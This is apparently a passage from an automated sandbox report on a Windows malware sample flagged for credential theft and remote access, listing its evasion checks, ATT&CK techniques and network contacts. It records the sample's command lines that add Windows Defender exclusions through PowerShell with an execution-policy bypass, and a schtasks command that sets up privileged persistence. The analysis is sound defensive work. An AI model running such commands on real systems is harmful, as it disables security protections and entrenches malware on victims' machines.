                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: Yara match | File source: 5q4X9fRo4b.exe, type: SAMPLE
                            Source: Yara match | File source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED
                            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: 5q4X9fRo4b.exe, 00000000.00000002.2502473225.0000000002F41000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                            Source: 5q4X9fRo4b.exe, SystemUser32.exe.0.dr | Binary or memory string: SBIEDLL.DLLINFO
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Memory allocated: 1270000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Memory allocated: 1AF40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe | Memory allocated: 1220000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe | Memory allocated: 1AF40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe | Memory allocated: 12A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe | Memory allocated: 1ADF0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe | Memory allocated: B40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe | Memory allocated: 1A930000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe | Memory allocated: F50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe | Memory allocated: 1AF30000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Window / User API: threadDelayed 2906
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Window / User API: threadDelayed 6911
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5981
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3868
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7316
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2382
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7967
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1629
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7906
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1762
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe TID: 820 | Thread sleep time: -37815825351104557s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208 | Thread sleep time: -8301034833169293s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep count: 7316 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep count: 2382 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 | Thread sleep time: -8301034833169293s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736 | Thread sleep count: 7967 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736 | Thread sleep count: 1629 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776 | Thread sleep time: -4611686018427385s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964 | Thread sleep count: 7906 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968 | Thread sleep count: 1762 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996 | Thread sleep time: -3689348814741908s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe TID: 2848 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe TID: 1056 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe TID: 1504 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe TID: 3268 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | File Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe | File Volume queried: C:\ FullSizeInformation
                            Source: 5q4X9fRo4b.exe, 00000000.00000002.2536068182.000000001BDD6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
                            Source: SystemUser32.exe.0.dr | Binary or memory string: vmware
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Process information queried: ProcessInformation

                            Anti Debugging

                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Code function: 0_2_00007FFAACCE7631 CheckRemoteDebuggerPresent, 0_2_00007FFAACCE7631
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Process queried: DebugPort
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Process token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe | Process token adjusted: Debug
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Memory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe'
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SystemUser32.exe'
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5q4X9fRo4b.exe'
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemUser32.exe'
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe"
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Queries volume information: C:\Users\user\Desktop\5q4X9fRo4b.exe VolumeInformation
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeQueries volume information: C:\Users\user\AppData\Roaming\SystemUser32.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeQueries volume information: C:\Users\user\AppData\Roaming\SystemUser32.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeQueries volume information: C:\Users\user\AppData\Roaming\SystemUser32.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeQueries volume information: C:\Users\user\AppData\Roaming\SystemUser32.exe VolumeInformation
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            Source: Yara match | File source: 5q4X9fRo4b.exe, type: SAMPLE
                            Source: Yara match | File source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED
                            Source: 5q4X9fRo4b.exe, 00000000.00000002.2535412525.000000001BDBB000.00000004.00000020.00020000.00000000.sdmp, 5q4X9fRo4b.exe, 00000000.00000002.2536068182.000000001BDD6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            Source: Yara match | File source: 5q4X9fRo4b.exe, type: SAMPLE
                            Source: Yara match | File source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000000.00000002.2502473225.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000000.00000002.2502473225.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: 5q4X9fRo4b.exe PID: 1408, type: MEMORYSTR
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED

                            Remote Access Functionality

                            Source: Yara match | File source: 5q4X9fRo4b.exe, type: SAMPLE
                            Source: Yara match | File source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000000.00000002.2502473225.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000000.00000002.2502473225.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: 5q4X9fRo4b.exe PID: 1408, type: MEMORYSTR
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED
                            MITRE ATT&CK Matrix (one row per matrix line; digits in front of a technique name are the report's count badges as extracted):

                            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 Input Capture | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                            Credentials | Domains | Default Accounts | 2 Scheduled Task/Job | 2 Scheduled Task/Job | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 23 System Information Discovery | Remote Desktop Protocol | 1 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                            Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | 21 Registry Run Keys / Startup Folder | 2 Scheduled Task/Job | 11 Obfuscated Files or Information | Security Account Manager | 541 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Registry Run Keys / Startup Folder | 2 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 151 Virtualization/Sandbox Evasion | SSH | Keylogging | 12 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 151 Virtualization/Sandbox Evasion | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            Behavior Graph (ID: 1530274, Sample: 5q4X9fRo4b.exe, Startdate: 09/10/2024, Architecture: WINDOWS, Score: 100)

                            • Start node: DNS/IP ip-api.com; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures. Started processes: 5q4X9fRo4b.exe, SystemUser32.exe (two instances), 2 other processes.
                            • 5q4X9fRo4b.exe: DNS/IP ip-api.com 208.95.112.1 (ports 49699, 80, TUT-ASUS, United States); 147.185.221.17 (ports 10406, 49933, SALSGIVERUS, United States). Dropped file: C:\Users\user\AppData\...\SystemUser32.exe (PE32). Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; 4 other signatures. Started processes: powershell.exe (three instances), 2 other processes.
                            • SystemUser32.exe: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file.
